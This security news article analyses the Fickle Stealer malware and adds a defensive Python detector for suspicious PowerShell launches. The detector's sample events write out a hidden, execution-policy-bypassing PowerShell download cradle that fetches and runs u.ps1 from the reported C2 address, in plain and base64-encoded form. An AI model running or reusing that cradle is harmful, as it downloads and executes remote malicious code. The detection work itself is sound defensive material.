Fickle Stealer, a new Rust-based malware, is actively using multiple attack vectors to infiltrate systems. It leverages PowerShell to bypass UAC and exfiltrates sensitive data, including credentials, browser history, cryptocurrency wallet details, and system information.
The malware evades detection by employing various techniques, such as file format diversity and self-deletion. Its ability to download files, capture screenshots, and display deceptive error messages further enhances its stealth and destructive potential.
Fickle Stealer is a new malware variant that has been actively distributed through various attack vectors since May 2024, including drive-by downloads, disguises as legitimate applications, ransomware payloads, and even the use of invalid digital certificates.
Once installed, the malware bypasses security mechanisms such as UAC to establish persistence. Its primary objective is to exfiltrate sensitive data from infected systems, posing a significant threat to organizations and individuals alike.
The malware uses a multi-stage attack chain, including VBA droppers and downloaders, to infiltrate vulnerable Windows systems, and employs advanced obfuscation techniques, such as custom packing, to mask its malicious code and evade static analysis.
The malware’s payload utilizes anti-analysis techniques to bypass sandbox environments and debugging tools, ensuring its stealthy operation. By generating deceptive error messages and detecting signs of analysis, Fickle Stealer successfully evades detection while exfiltrating sensitive data from compromised systems.
An analyzed file contains obfuscated strings indicative of malicious activity. When decoded, the strings reveal a PowerShell command designed to fetch a script from a specific IP address, likely a Command and Control (C2) server, and execute it hidden from the user.
The command employs various techniques to evade detection, including running the PowerShell window in hidden mode and bypassing execution policies, which suggests a sophisticated attack aimed at stealthily compromising the system.
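As an added example (not code from the Trellix analysis or from this article), the following Python script shows how a defender might triage process-creation telemetry for the launch pattern described above: a hidden PowerShell window, an execution-policy bypass, an -EncodedCommand payload that has to be base64/UTF-16LE-decoded before any regex can see the cradle inside it, a remote download cradle, a cmd.exe parent, and the C2 address and script names reported later in this article. The sample events are constructed, not real telemetry; the field names (pid, image, parent, cmdline) and the verdict thresholds are assumptions made for the example.

```python
import base64
import re

# Indicators taken from the article: the reported C2 address and the two script names.
KNOWN_C2_HOSTS = {"185.213.208.245"}
KNOWN_SCRIPT_NAMES = {"u.ps1", "engine.ps1"}

# PowerShell accepts abbreviated switches (-w, -win, -WindowStyle; -ep, -ex, -ExecutionPolicy;
# -e, -ec, -enc, -EncodedCommand), so the patterns match the prefixes, not one spelling.
HIDDEN_RE = re.compile(r"(?<![\w-])-w\w*\s+(?:hidden|h)\b", re.I)
EXEC_POLICY_RE = re.compile(r"(?<![\w-])-e(?:p|x\w*)\s+(?:bypass|unrestricted)\b", re.I)
ENCODED_RE = re.compile(r"(?<![\w-])-e(?:c|n\w*)?\s+([A-Za-z0-9+/=]{16,})", re.I)
DOWNLOAD_RE = re.compile(
    r"\b(?:downloadstring|downloadfile|downloaddata|invoke-webrequest|iwr|"
    r"invoke-restmethod|irm|net\.webclient|start-bitstransfer)\b", re.I)
IEX_RE = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
SCRIPT_RE = re.compile(r"\b[\w-]+\.ps1\b", re.I)


def encode_ps_command(script: str) -> str:
    """Mirror PowerShell's -EncodedCommand convention (UTF-16LE, then base64).
    Used here only to build the constructed sample event."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the plaintext of an -EncodedCommand argument, or None if there is none
    (or the argument is not valid base64 / UTF-16LE)."""
    match = ENCODED_RE.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event: dict) -> dict:
    """Score one process-creation record and explain every reason that fired."""
    cmdline = event["cmdline"]
    decoded = decode_encoded_command(cmdline)
    # Content checks run over the raw command line plus the decoded payload; otherwise
    # an encoded command hides the download cradle and the C2 host from the regexes.
    text = cmdline if decoded is None else cmdline + " " + decoded
    reasons = []
    if HIDDEN_RE.search(cmdline):
        reasons.append("hidden_window")
    if EXEC_POLICY_RE.search(cmdline):
        reasons.append("execution_policy_bypass")
    if decoded is not None:
        reasons.append("encoded_command")
    if DOWNLOAD_RE.search(text):
        reasons.append("remote_download")
        if IEX_RE.search(text):
            reasons.append("download_cradle")  # fetched content is executed in memory
    hosts = set(IP_RE.findall(text)) & KNOWN_C2_HOSTS
    if hosts:
        reasons.append("known_c2:" + ",".join(sorted(hosts)))
    scripts = {s.lower() for s in SCRIPT_RE.findall(text)} & KNOWN_SCRIPT_NAMES
    if scripts:
        reasons.append("known_script:" + ",".join(sorted(scripts)))
    if event.get("parent", "").lower().endswith("cmd.exe"):
        reasons.append("spawned_by_cmd")  # the article reports cmd launching the script
    # Assumed thresholds: a known C2 host is decisive; otherwise two or more
    # behavioural reasons together mark the event for analyst review.
    verdict = "malicious" if hosts else ("suspicious" if len(reasons) >= 2 else "clean")
    return {"pid": event["pid"], "verdict": verdict, "reasons": reasons, "decoded": decoded}


def triage(events):
    """Return the analysis of every event that is not clean."""
    return [r for r in (analyze_event(e) for e in events) if r["verdict"] != "clean"]


# Constructed sample events (not real telemetry): a benign admin script, the hidden
# policy-bypassing launch from cmd.exe, and the same cradle wrapped in -EncodedCommand.
PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"pid": 4101, "image": PS_IMAGE, "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},
    {"pid": 4102, "image": PS_IMAGE, "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://185.213.208.245/u.ps1')\""},
    {"pid": 4103, "image": PS_IMAGE, "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "powershell.exe -NoP -NonI -W Hidden -Enc " + encode_ps_command(
         "Invoke-Expression (New-Object Net.WebClient)"
         ".DownloadString('http://185.213.208.245/u.ps1')")},
]

if __name__ == "__main__":
    for result in triage(SAMPLE_EVENTS):
        print(result["pid"], result["verdict"], ", ".join(result["reasons"]))
        if result["decoded"]:
            print("   decoded:", result["decoded"])
```

The decode step is the part most often missed in ad-hoc hunting: a rule that only inspects the raw command line never sees the host or the `DownloadString` call inside an encoded payload, so the IP and script-name indicators from this article would not fire on the third sample event without it.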
The u.ps1 script leverages a UAC bypass technique to execute Fickle Stealer and establishes persistence by scheduling engine.ps1. Engine.ps1 scans specific drives for executables and injects shellcode, which downloads and executes u.ps1 from the internet.
It also logs the paths of injected files in base64 format to a shared location to prevent redundant injections. The overall goal is to exfiltrate sensitive victim information, such as geolocation, system details, and user credentials, to a Telegram bot controlled by the attacker.
According to Trellix, the analyzed file (MD5: C3C7DAA897ABEB907AEB13250E882FE5) executes silently and terminates itself immediately.
However, it stealthily launches PowerShell, which in turn uses cmd to establish a covert command-and-control (C&C) connection to a remote server (185.213.208.245) by executing a malicious PowerShell script (u.ps1) with elevated privileges in a hidden window.
The file is a malicious payload associated with Fickle Stealer: upon execution, it attempts to connect to the IP address 185.213.208.245 to download additional malicious components.
To circumvent User Account Control (UAC) restrictions, the file employs a PowerShell script to execute the core Fickle Stealer payload. The validity of the digital certificate embedded in the file can be assessed with the sigcheck tool.